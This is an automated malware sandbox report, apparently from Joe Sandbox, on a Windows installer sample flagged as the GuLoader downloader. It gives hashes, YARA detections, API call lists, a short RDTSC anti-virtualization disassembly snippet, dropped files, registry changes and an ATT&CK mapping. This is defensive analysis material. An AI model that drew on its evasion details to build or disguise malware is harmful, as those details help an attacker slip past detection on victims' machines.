Edit tour

Windows Analysis Report
payload.exe

Overview

General Information

Sample Name:	payload.exe
Analysis ID:	747729
MD5:	2d3c3f5d92529875803a08ba3299874f
SHA1:	e1fc254222e9c4b6bcdaf366b638f3f28e1eb595
SHA256:	32d2de2bcabea4a18b85b93dde9e46501101431fdbc35c2000073247e3ca0b5c
Infos:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

Uses 32bit PE files

Drops PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

PE / OLE file has an invalid certificate

Contains functionality to dynamically determine API calls

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

payload.exe (PID: 1036 cmdline: C:\Users\user\Desktop\payload.exe MD5: 2D3C3F5D92529875803A08BA3299874F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1416776926.0000000000621000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000001.00000002.1416990140.0000000003A30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: payload.exe PID: 1036	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: payload.exe	ReversingLabs: Detection: 48%
Source: payload.exe	Virustotal: Detection: 27%			Perma Link

Source: payload.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\payload.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Strikketjet

Jump to behavior

Source: payload.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_00405FFD FindFirstFileA,FindClose,	1_2_00405FFD
Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_0040559B
Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_00402688 FindFirstFileA,	1_2_00402688

Source: payload.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: payload.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: payload.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: payload.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: payload.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: payload.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: payload.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: payload.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: payload.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: payload.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: payload.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: payload.exe	String found in binary or memory: http://www.certum.pl/CPS0

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405050

Source: payload.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004030D9

Source: C:\Users\user\Desktop\payload.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_0040488F		1_2_0040488F
Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_00406344		1_2_00406344

Source: payload.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\payload.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\payload.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior

Source: C:\Users\user\Desktop\payload.exe

Process Stats: CPU usage > 98%

Source: payload.exe	ReversingLabs: Detection: 48%
Source: payload.exe	Virustotal: Detection: 27%

Source: C:\Users\user\Desktop\payload.exe

File read: C:\Users\user\Desktop\payload.exe

Jump to behavior

Source: payload.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\payload.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\payload.exe

1_2_004030D9

Source: C:\Users\user\Desktop\payload.exe

File created: C:\Users\user\AppData\Local\Temp\nsw8C78.tmp

Jump to behavior

Source: C:\Users\user\Desktop\payload.exe

File written: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Custom3.ini

Jump to behavior

Source: classification engine

Classification label: mal68.troj.evad.winEXE@1/5@0/0

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_0040205E CoCreateInstance,MultiByteToWideChar,

1_2_0040205E

Source: C:\Users\user\Desktop\payload.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_0040431C

Source: C:\Users\user\Desktop\payload.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Strikketjet

Jump to behavior

Source: payload.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.1416990140.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1416776926.0000000000621000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: payload.exe PID: 1036, type: MEMORYSTR

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_10002D20 push eax; ret

1_2_10002D4E

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Users\user\Desktop\payload.exe

File created: C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\payload.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\payload.exe

RDTSC instruction interceptor: First address: 0000000003A332CE second address: 0000000003A332CE instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 00007DB0h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FC040B5F4BFh 0x0000000a test dx, bx 0x0000000d test bh, ah 0x0000000f inc ebp 0x00000010 inc ebx 0x00000011 cmp bh, ah 0x00000013 rdtsc

Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_00405FFD FindFirstFileA,FindClose,	1_2_00405FFD
Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_0040559B
Source: C:\Users\user\Desktop\payload.exe	Code function: 1_2_00402688 FindFirstFileA,	1_2_00402688

Source: C:\Users\user\Desktop\payload.exe	API call chain: ExitProcess graph end node			graph_1-4825
Source: C:\Users\user\Desktop\payload.exe	API call chain: ExitProcess graph end node			graph_1-4828

Source: payload.exe, 00000001.00000002.1416755723.000000000060E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Users\user\Desktop\payload.exe

Code function: 1_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

1_2_00405D1B

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Windows Service	1 Access Token Manipulation	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
payload.exe	48%	ReversingLabs	Win32.Downloader.Minix
payload.exe	28%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll	8%	Metadefender	Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.payload.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File
1.2.payload.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File

Domains

Source	Detection	Scanner	Label	Link
windowsupdatebg.s.llnwi.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://subca.ocsp-certum.com05	0%	URL Reputation	safe
http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdatebg.s.llnwi.net	41.63.96.128	true	false	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctnca2.crl0l	payload.exe	false		high
http://repository.certum.pl/ctnca2.cer09	payload.exe	false		high
http://crl.certum.pl/ctsca2021.crl0o	payload.exe	false		high
http://nsis.sf.net/NSIS_Error	payload.exe	false		high
http://repository.certum.pl/ctnca.cer09	payload.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	payload.exe	false		high
http://repository.certum.pl/ctsca2021.cer0	payload.exe	false		high
http://crl.certum.pl/ctnca.crl0k	payload.exe	false		high
http://subca.ocsp-certum.com05	payload.exe	false	URL Reputation: safe	unknown
http://www.certum.pl/CPS0	payload.exe	false		high
http://subca.ocsp-certum.com02	payload.exe	false	URL Reputation: safe URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	payload.exe	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	747729
Start date and time:	2022-11-16 17:34:32 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	payload.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.evad.winEXE@1/5@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62.9% (good quality ratio 61.5%) Quality average: 88.3% Quality standard deviation: 21.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 54 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdatebg.s.llnwi.net	Shipping_Doc_GMLKMNL2211003.pdf.exe	Get hash	malicious	Browse	178.79.242.0
	PO 00047.exe	Get hash	malicious	Browse	178.79.242.0
	jOct1E2UxQ.exe	Get hash	malicious	Browse	178.79.242.128
	file.exe	Get hash	malicious	Browse	95.140.236.128
	UC2DFXQIBiE2kQ.dll	Get hash	malicious	Browse	95.140.236.0
	UC2DFXQIBiE2kQ.dll	Get hash	malicious	Browse	41.63.96.128
	MCLRGN2200299 DRAFT.xls	Get hash	malicious	Browse	95.140.236.0
	file.exe	Get hash	malicious	Browse	95.140.236.128
	file.exe	Get hash	malicious	Browse	178.79.225.0
	ACH Payment Confirmation.htm	Get hash	malicious	Browse	178.79.242.128
	file.exe	Get hash	malicious	Browse	95.140.236.0
	file.exe	Get hash	malicious	Browse	95.140.236.0
	file.exe	Get hash	malicious	Browse	178.79.242.0
	MxkTEqAL3V.exe	Get hash	malicious	Browse	41.63.96.128
	Thunderbird Setup 102.3.0.exe	Get hash	malicious	Browse	178.79.242.128
	SecuriteInfo.com.Variant.Jaik.88531.30149.12290.exe	Get hash	malicious	Browse	41.63.96.128
	R22SI005577.exe	Get hash	malicious	Browse	95.140.230.192
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.5442.12085.doc	Get hash	malicious	Browse	41.63.96.0
	ORDEN_DE_PEDIDO.exe	Get hash	malicious	Browse	95.140.236.0
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.7797.1932.rtf	Get hash	malicious	Browse	95.140.230.128

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll	FACTURA pdf.exe	Get hash	malicious	Browse
	FACTURA pdf.exe	Get hash	malicious	Browse
	Tudbrlet.exe	Get hash	malicious	Browse
	Tudbrlet.exe	Get hash	malicious	Browse
	factura 1722 pdf.exe	Get hash	malicious	Browse
	Kapsejladsers (2).exe	Get hash	malicious	Browse
	Snedkerlims.exe	Get hash	malicious	Browse
	factura 1722 pdf.exe	Get hash	malicious	Browse
	Kapsejladsers (2).exe	Get hash	malicious	Browse
	Snedkerlims.exe	Get hash	malicious	Browse
	factura 1722 pdf.exe	Get hash	malicious	Browse
	factura 1722 pdf.exe	Get hash	malicious	Browse
	differentialkvotienternes.exe	Get hash	malicious	Browse
	Lserskarers.exe	Get hash	malicious	Browse
	differentialkvotienternes.exe	Get hash	malicious	Browse
	Lserskarers.exe	Get hash	malicious	Browse
	Document Scan Copy.img	Get hash	malicious	Browse
	Document Scan Copy.img	Get hash	malicious	Browse
	Scan_Doc.docx.exe	Get hash	malicious	Browse
	Scan_Doc.docx.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Custom3.ini

Download File

Process:	C:\Users\user\Desktop\payload.exe
File Type:	Generic INItialization configuration [Effect2]
Category:	dropped
Size (bytes):	5487
Entropy (8bit):	4.3524133300305206
Encrypted:	false
SSDEEP:	96:hJDu0BoU1s8G9LfGOOOOOOjOOOOOOEOOOOOOBOOOOOONsOOOOOO/OOOOOOAOOOOW:mCs8GVfGOOOOOOjOOOOOOEOOOOOOBOO4
MD5:	9D3C4AEBBDBCB28530EF93081611A33E
SHA1:	867F6A5B16638E1BFC012DFF7E63E45ADD44342E
SHA-256:	24EC6D9A80EF077A81018001F16E7D7EFE6DEB82B7BD120C8C5227BA65C63F07
SHA-512:	4E5E2ADAE00F160EBDB322B12C33582F8397B909841E76FA634D10C3BCAF90C822DA8F9F494A29FA0EA4B558B6D44BAAEBAF737156B6E38359FB5CFC36874D2E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..;Static - FW effect index 0..[Effect1]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=0..Color2R=0..Color2G=0..Color2B=0..DirectType=0..SpeedType=0....;Breath - FW effect index 1..[Effect2]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=49..Color2R=8..Color2G=255..Color2B=240..SpeedType=2..DirectType=0..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;Strobing - FW effect index 2..[Effect3]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=102..Color2R=0..Color2G=0..Color2B=0..SpeedType=2..DirectType=0..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;ColorCycle - FW effect index 4..[Effect4]..ColorR=255..ColorG=0..ColorB=0..Direction=0..Random=0..Ext1=0..Speed=60..Color2R=0..Color2G=0..Color2B=0..SpeedType=2..DirectType=1..MusicType=0..CometType=0..StarType=0..TriggerType=0..TemperatureH=0..TemperatureL=0....;Rainbow - FW effect index 8..[E

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Eksekutivkomiteers.Ant

Download File

Process:	C:\Users\user\Desktop\payload.exe
File Type:	data
Category:	dropped
Size (bytes):	127797
Entropy (8bit):	7.998586833244433
Encrypted:	true
SSDEEP:	3072:tCdM5ns1LzGs28F5esXi/MLD5UUZCqOUrVqA398Uvo5:gdny+eL/2FZC1UrVq/9
MD5:	09E150B5160530C9A71AB335A646880C
SHA1:	5D0D02A2A074521DE765C1221B3F9373FBD23584
SHA-256:	4068467148C37F9FBFE41EAE8B463A0089253A1CE19527D9B17975E8A6FA8D72
SHA-512:	97006C5DE0D81D3BB1A32F3B0D6AF48C7673F5AD59632B806B7F4A96553E8A8091C484B10B20A67F819951353A900C2FBB8F2EEF2B7187220E9C7C0A104C026C
Malicious:	false
Reputation:	low
Preview:	@.[ch....o...g....\.i.0..c..`.2L.......B6.M-..k..D=...Z..T....x....Hr....!.....(....m.z..H.xP4@G.%=m.$.uG..Q4.].... 6.U.d...l7r.9...._.],...J.a&..S.f.R.i..z...x2 .8.x...A.....e......'$."~..w-9...v....}.k..0Y..Z....9.Q..E....SL..1.@..m.(..9...}..@.23.....P..Rg.Yf...S...x..D..k....7)^.....W..x...G./(...2...........L..4./.......B"..Xthz...G.R]...77c..!,r'#83.~....,..Nt......P...&o..y_.8X.....xM.cJ.C^.._..Sd..:.2}.t.`.RN._.j$t..(I...u5..b...Q..r...$.5Ad.P..['.%.b.Q..>..1......#3.l.x>....,...i..D..W=...^.t.FC.....+{:eq....n..a....V..'.k....!Z...cfRT.2%..Z^D..Z.l9...?.....&U..4U..^......t6.....K..Y.._<.$.d........pyZVe4..k<8.l..C..P.....l.+...<V.?......=y.'....$L..^..<@{....F....QQ.z.....5R..+F.e.kd..wR.1.J...E./-&.e....\...Cr..l.....53...`MEh.x...E.5k....,..3....k....Y..s.5...D 1t.........;.....B.....9.U^. ..'..gF..>..43....4.4..<..S....5...\.Y.......kg...[ ..}.t.5..R..AhK..!..T.Rj.....qP..So.u..b*.....G.J..W......\|.Jt.f5...

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration\Skemp210.Hav

Download File

Process:	C:\Users\user\Desktop\payload.exe
File Type:	data
Category:	dropped
Size (bytes):	184099
Entropy (8bit):	6.666506272273493
Encrypted:	false
SSDEEP:	3072:EhpAueWpyddG3BECoFpOICTSZi/to++4ONiry7:EhOuePmBECoFpOdlo++x
MD5:	3C81A35751368F2A85AF4F71AADF52CE
SHA1:	9F822CDD119082C9D727EBA67A6423CF0D947DD4
SHA-256:	AE1EC4A1A47187BAC009D8FD7B6B9D941610FCFF15FE1946833B313AE6DED8BE
SHA-512:	03E7F7E30342CC3E430699ADDEA4A58D08E2FDC1F0F40F8A10FD774176C985D74615413E104F0A56FB60F9A106242AC7C82E65E30794B18533E72AC5ED0A09A8
Malicious:	false
Reputation:	low
Preview:	3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333

C:\Users\user\AppData\Local\Temp\Dybfrossen.ini

Download File

Process:	C:\Users\user\Desktop\payload.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.131687083026442
Encrypted:	false
SSDEEP:	3:pDQo7JKU2QYEJry:FQov1YEw
MD5:	09EFF7D465578AB16342D01B9115172C
SHA1:	13311B4DEBC749082CFB1A65DA02759642A9C1D7
SHA-256:	1B5F1F40B8BA4A1F6C314D8C2E1F16D138A70C0D96A3010CF4EC4D44110A443F
SHA-512:	62F99CCB5C6E936A61279DCA2AECB61D6B1B7E3E7E750B0D4C38F10BFE3EE0CE02BC58FA2B87C6784BF60BE0A700BBF179FD8905781E6B0007DE64B8B391685F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Decimallngdernes]..Floragrafere=Palms..

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\payload.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.770803561213006
Encrypted:	false
SSDEEP:	192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
MD5:	2AE993A2FFEC0C137EB51C8832691BCB
SHA1:	98E0B37B7C14890F8A599F35678AF5E9435906E1
SHA-256:	681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
SHA-512:	2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse Antivirus: Metadefender, Detection: 8%, Browse
Joe Sandbox View:	Filename: FACTURA pdf.exe, Detection: malicious, Browse Filename: FACTURA pdf.exe, Detection: malicious, Browse Filename: Tudbrlet.exe, Detection: malicious, Browse Filename: Tudbrlet.exe, Detection: malicious, Browse Filename: factura 1722 pdf.exe, Detection: malicious, Browse Filename: Kapsejladsers (2).exe, Detection: malicious, Browse Filename: Snedkerlims.exe, Detection: malicious, Browse Filename: factura 1722 pdf.exe, Detection: malicious, Browse Filename: Kapsejladsers (2).exe, Detection: malicious, Browse Filename: Snedkerlims.exe, Detection: malicious, Browse Filename: factura 1722 pdf.exe, Detection: malicious, Browse Filename: factura 1722 pdf.exe, Detection: malicious, Browse Filename: differentialkvotienternes.exe, Detection: malicious, Browse Filename: Lserskarers.exe, Detection: malicious, Browse Filename: differentialkvotienternes.exe, Detection: malicious, Browse Filename: Lserskarers.exe, Detection: malicious, Browse Filename: Document Scan Copy.img, Detection: malicious, Browse Filename: Document Scan Copy.img, Detection: malicious, Browse Filename: Scan_Doc.docx.exe, Detection: malicious, Browse Filename: Scan_Doc.docx.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.921170078771613
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	payload.exe
File size:	291416
MD5:	2d3c3f5d92529875803a08ba3299874f
SHA1:	e1fc254222e9c4b6bcdaf366b638f3f28e1eb595
SHA256:	32d2de2bcabea4a18b85b93dde9e46501101431fdbc35c2000073247e3ca0b5c
SHA512:	9941dade6684a2d4d649b63e47616106640cc1e6ecf82453429e5bd00afdc59a92107078af3ac5473d42f6b7e2f43e87a39d296d4c7bba6daf9c124d4263c269
SSDEEP:	6144:oC2zJXehhSZ0fqiR3tcUsCdny+eL/2FZC1UrVq/O2:cGYZWF3tICdny+e0Z3q/J
TLSH:	D35413742BA1D47BF989067106D7997AE6BBF7A034105A4B77304FF63E512921E3A0CC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	f89ab6b68aa686ec

Static PE Info

General

Entrypoint:	0x4030d9
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
